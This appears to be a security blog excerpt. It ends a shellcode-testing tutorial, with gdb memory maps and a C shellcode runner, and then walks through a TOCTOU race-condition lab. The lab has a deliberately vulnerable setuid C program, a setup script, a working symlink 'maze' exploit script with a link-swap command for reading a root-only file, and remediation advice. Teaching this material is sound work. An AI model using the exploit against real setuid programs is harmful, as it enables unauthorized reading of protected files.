0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw- 0x00007ffff7dd5000 0x00007ffff7dfc000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.27.so 0x00007ffff7fcd000 0x00007ffff7fcf000 0x0000000000000000 rw- 0x00007ffff7ff7000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar] 0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso] 0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000027000 r-- /lib/x86_64-linux-gnu/ld-2.27.so 0x00007ffff7ffd000 0x00007ffff7ffe000 0x0000000000028000 rw- /lib/x86_64-linux-gnu/ld-2.27.so 0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw- 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack] 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall] (gef➤ vmmap is exactly the same of running cat /proc/{process_id}/maps, where process_id is the process of the debugged program. To obtain the process id of the currently running debugged program run info inferior.) In lines 3,4 and 5 we can see that there are 3 memory regions that map the test_shellcode executable with different permissions. We can see that the variable code (0x555555755010) is located in a memory region that has read and write permissions, in line 5. This is the same information that we obtained previously by reading the ELF file (with the readelf command). We can also see that the address pointed by the variable code (0x5555555546c4) is located in a memory region that has read and execute permission, in line 3. Alternative test code Sometimes over the Internet you see code like this: int main(){ char code[]= "\xb8\x3c\x00\x00\x00\xbf\x05\x00\x00\x00\x0f\x05"; void (*shell)(); shell=(void (*)())code; (*shell)(); //shell(); } Here, the code variable is declared inside the main function and it is NOT a pointer. This code WILL NOT work if compiled with: $ gcc -o test_shellcode ./test_shellcode.c The code will compile correctly but it will produce Segmentation fault when executed. The reason is simple, the code variable is located in the stack and since it is a non-executable memory region, if an instruction tries to execute from here the system will produce a segmentation fault. This code WILL work if compiled by passing the flag to make the stack executable: $ gcc -o test_shellcode -z execstack ./test_shellcode.c (Alternatively we can also use the execstack tool to change the executable stack flag of an ELF file.)

TOC - TOU

In this article I want to describe a common race condition vulnerability type known as Time-Of-Check - Time-Of-Use (TOC-TOU). I am going through the following steps: The vulnerability Setup the environment for the challenge Exploit the challenge How to remediate for the vulnerable code The vulnerability Let’s discuss the vulnerability by analysing the following code: // filename: toc_tou.c #include<unistd.h> #include<stdio.h> int main(int argc, char * argv[]) { FILE * file; int can_read, c; can_read = access(argv[1], R_OK); if (can_read == 0) { file = fopen(argv[1], "r"); while((c = fgetc(file)) != EOF){ putc(c, stdout); } fclose(file); } else{ printf("You have no power!\n"); } return 0; } In line 10, the file path given as argument, will be used to check if you have the permission to read the file pointed by it. If you don’t the program will print “You have no power!”. In line 13, the same file path will be used to read the file pointed by it. The problem comes when you provide a path to a file that you can read, in order to pass the check in line 10, and before the program reach line 13 you change the file pointed by the same path. The time between the execution of line 10 and the line 13 is what we have to change the file pointed by the path provided. Even if it may seem that there is not much time between the execution of the two command there is still a race condition that we are going to exploit. In this vulnerable program, the read operation performed by the root user. Of course, it is not a good practice to run a program with high privileges but the program should drop them as soon as possible and run with lowest possible privileges. In this article we are not going to dig more into this aspect. Setup the environment for the challenge To setup the challenge we are going to setup the environment with the following code: #!/bin/bash # filename: create_challenge.sh rm -f file_to_check.txt sudo rm -f file_to_open.txt echo 'public file' > file_to_check.txt echo 'secret file' > file_to_open.txt chmod 700 file_to_open.txt sudo chown root:root file_to_open.txt make sudo chown root:root toc_tou sudo chmod u+s toc_tou Where the makefile is: all: toc_tou toc_tou: toc_tou.c makefile gcc -o toc_tou toc_tou.c Once you run $ ./create_challenge.sh you should have a folder that looks like this: -rwxr-xr-x 1 pippo pippo 265 May 23 08:52 create_challenge.sh* -rw-r--r-- 1 pippo pippo 12 May 23 08:55 file_to_check.txt -rwx------ 1 root root 12 May 23 08:55 file_to_open.txt* -rwxr-xr-x 1 pippo pippo 72 Apr 20 22:38 makefile* -rwsr-xr-x 1 root root 8568 May 23 08:55 toc_tou* -rwxr-xr-x 1 pippo pippo 863 May 23 08:52 toc_tou.c* In line 5, you can see that the toc_tou program has the setuid bit active and the program owner is root. This means that when the program is going to be executed it will run with he effective user ID as root. Exploit the challenge To exploit this program we are going to provide the program a path to a “filesystem maze” so that to reach the file pointed by the path, the system need traverse a lot of folders: #!/bin/bash currentDir=$(pwd) linkOut=0 linkIn=1 numFolders=1900 fileTarget=file_to_check.txt create_folders(){ folder=$1 dirstring="." for index in $(seq 0 $numFolders); do mkdir $folder && cd $folder && dirstring=${dirstring}/$folder ; done ln -s $currentDir/link$linkIn link$linkIn cd $currentDir ln -s $currentDir/$dirstring/link$linkIn link$linkOut linkOut=$(($linkOut+1)) linkIn=$(($linkIn+1)) } create_folders "1" create_folders "2" create_folders "3" create_folders "4" create_folders "5" create_folders "6" create_folders "7" create_folders "8" create_folders "9" create_folders "0" ln -s $fileTarget link$linkOut ln -s link0 link This code will create 10 folders that have 1900 folders inside each of them. It will also create 10 links in the current folder that point to the inner most folder where another link points to the next link in the main folder. This chain of links will end with the link in the main folder that will point to the file we need to check. link –> link0 link0 –> folder –> . . . –> folder –> link1 . . . link8 –> folder –> . . . –> folder –> link9 link9 –> file_to_check.txt As explained before the purpose of this “maze” is to slow down the traversal of the path done by the system. When the system is busy traversing the path to reach the legitimate file used to check the permission, we can change the file pointed by the initial path to a file of our choice. Since the program is running with root permission, we will be able to read any file. Now we can run the program as: $ ./toc_tou link My CPU is an i7 running at 2.90GHz and it takes about 1.5 seconds to traverse the maze to find the file used to check the access permissions. During this time we can have another terminal open to change the pointer of the link given as argument: $ rm link && ln -s file_to_open.txt link A common problem that you can incur while trying this challenge is that when you execute the creation of the maze the system is going to cache them in order to speed-up future operations. To clear the cache from dentries, inodes and page cache, you can execute: # sync && echo 3 > /proc/sys/vm/drop_caches Now, if you try to exploit the vulnerable program again, your system is going to traverse the path again. It is clear that in a real exploitation, you won’t have access to this privileged command therefore you’ll have to wait for the cache to clean itself or use other programs to force the cache to be filled with other data. It is of course possible to create a bigger maze to have more time between the two operations.In my trials, with 36 folders, each of them with 1900 inner folders, the path resolution is going to take 3.6 seconds. With 36 folders, each of them with 1500 inner folders, the path resolution is going to take 2.6 seconds. How to remediate for the vulnerable code The program is vulnerable because it operates on file paths that can be changed after the check operation. To avoid that, the program need to operate on file descriptor. The open function can be used open a file and it returns a file descriptor. Once you have the file descriptor you can use other functions to check the permission of the file, like fstat. int open(const char *pathname, int flags); int fstat(int fd, struct stat *statbuf); In addition to use functions that use file descriptors you can use file pointers too. A file descriptor is an integer used to identify an opened file at kernel level. A file pointer is a C standard library construct, called FILE. The FILE wraps the file descriptor, and adds other features to it. (It is possible to get the file pointer from a file descriptor, and vice verse, with the functions fileno and fdopen.)